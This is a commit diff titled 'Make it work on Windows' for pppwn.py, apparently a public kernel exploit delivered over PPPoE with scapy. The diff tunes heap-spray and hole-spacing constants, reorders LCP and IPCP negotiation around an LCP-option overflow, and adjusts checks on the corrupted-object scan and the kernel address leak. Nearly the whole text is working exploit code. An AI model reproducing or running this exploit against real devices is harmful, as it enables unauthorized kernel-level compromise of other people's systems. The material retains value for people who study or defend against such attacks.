Make it work on Windows.

TheOfficialFloW · May 1, 2024 · ec9d54d · ec9d54d
1 parent 0730790
commit ec9d54d
Showing 1 changed file with 37 additions and 29 deletions.
diff --git a/pppwn.py b/pppwn.py
@@ -149,12 +149,12 @@ def handler(self, pkt):
 
 
 class Exploit():
-    SPRAY_NUM = 0x800
+    SPRAY_NUM = 0x1000
     PIN_NUM = 0x1000
     CORRUPT_NUM = 0x1
 
     HOLE_START = 0x400
-    HOLE_SPACE = 0x4
+    HOLE_SPACE = 0x10
 
     LCP_ID = 0x41
     IPCP_ID = 0x41
@@ -182,6 +182,20 @@ def kdlsym(self, addr):
         return self.kaslr_offset + addr
 
     def lcp_negotiation(self):
+        print('[*] Sending LCP configure request...')
+        self.s.send(
+            Ether(src=self.source_mac,
+                  dst=self.target_mac,
+                  type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
+            PPP() / PPP_LCP(code=CONF_REQ, id=self.LCP_ID))
+
+        print('[*] Waiting for LCP configure ACK...')
+        while True:
+            pkt = self.s.recv()
+            if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
+                    PPP_LCP_Configure].code == CONF_ACK:
+                break
+
         print('[*] Waiting for LCP configure request...')
         while True:
             pkt = self.s.recv()
@@ -196,21 +210,23 @@ def lcp_negotiation(self):
                   type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
             PPP() / PPP_LCP(code=CONF_ACK, id=pkt[PPP_LCP_Configure].id))
 
-        print('[*] Sending LCP configure request...')
+    def ipcp_negotiation(self):
+        print('[*] Sending IPCP configure request...')
         self.s.send(
-            Ether(src=self.source_mac,
-                  dst=self.target_mac,
-                  type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
-            PPP() / PPP_LCP(code=CONF_REQ, id=self.LCP_ID))
+            Ether(
+                src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE)
+            / PPPoE(sessionid=self.SESSION_ID) / PPP() /
+            PPP_IPCP(code=CONF_REQ,
+                     id=self.IPCP_ID,
+                     options=PPP_IPCP_Option_IPAddress(data=self.SOURCE_IPV4)))
 
-        print('[*] Waiting for LCP configure ACK...')
+        print('[*] Waiting for IPCP configure ACK...')
         while True:
             pkt = self.s.recv()
-            if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
-                    PPP_LCP_Configure].code == CONF_ACK:
+            if pkt and pkt.haslayer(
+                    PPP_IPCP) and pkt[PPP_IPCP].code == CONF_ACK:
                 break
 
-    def ipcp_negotiation(self):
         print('[*] Waiting for IPCP configure request...')
         while True:
             pkt = self.s.recv()
@@ -243,22 +259,6 @@ def ipcp_negotiation(self):
                              id=pkt[PPP_IPCP].id,
                              options=pkt[PPP_IPCP].options))
 
-        print('[*] Sending IPCP configure request...')
-        self.s.send(
-            Ether(
-                src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE)
-            / PPPoE(sessionid=self.SESSION_ID) / PPP() /
-            PPP_IPCP(code=CONF_REQ,
-                     id=self.IPCP_ID,
-                     options=PPP_IPCP_Option_IPAddress(data=self.SOURCE_IPV4)))
-
-        print('[*] Waiting for IPCP configure ACK...')
-        while True:
-            pkt = self.s.recv()
-            if pkt and pkt.haslayer(
-                    PPP_IPCP) and pkt[PPP_IPCP].code == CONF_ACK:
-                break
-
     def ppp_negotation(self, cb=None):
         print('[*] Waiting for PADI...')
         while True:
@@ -670,6 +670,7 @@ def run(self):
                       dst=self.target_mac,
                       type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
                 PPP(proto=0x4141))
+            self.s.recv()
             sleep(0.0005)
 
         print('[+] Pinning to CPU 0...done')
@@ -692,6 +693,13 @@ def run(self):
                                                      (TARGET_SIZE - 4)) /
                                       PPP_LCP_Option(data=overflow_lle))))
 
+        print('[*] Waiting for LCP configure reject...')
+        while True:
+            pkt = self.s.recv()
+            if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
+                    PPP_LCP_Configure].code == CONF_REJ:
+                break
+
         # Re-negotiate after rejection
         self.lcp_negotiation()
         self.ipcp_negotiation()
@@ -732,7 +740,7 @@ def run(self):
                 ICMPv6NDOptDstLLAddr(lladdr=self.source_mac))
 
         if not corrupted:
-            print('[-] Scanning for corrupted object...failed')
+            print('[-] Scanning for corrupted object...failed. Please retry.')
             exit(1)
 
         print(
@@ -756,7 +764,7 @@ def run(self):
 
         if (self.pppoe_softc_list & 0xffffffff00000fff
                 != self.offs.PPPOE_SOFTC_LIST & 0xffffffff00000fff):
-            print('[-] Error leak is invalid.')
+            print('[-] Error leak is invalid. Wrong firmware?')
             exit(1)
 
         print('')